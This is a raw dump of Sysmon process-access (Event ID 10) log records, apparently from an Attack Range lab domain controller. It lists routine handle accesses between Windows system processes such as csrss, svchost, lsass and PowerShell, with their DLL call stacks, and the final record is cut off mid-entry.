13:53:05.477{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1A00-000000009101}2192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8541-5FCF-1000-000000009101}11561472C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.461{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-8541-5FCF-1000-000000009101}11561472C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+65888|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.415{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 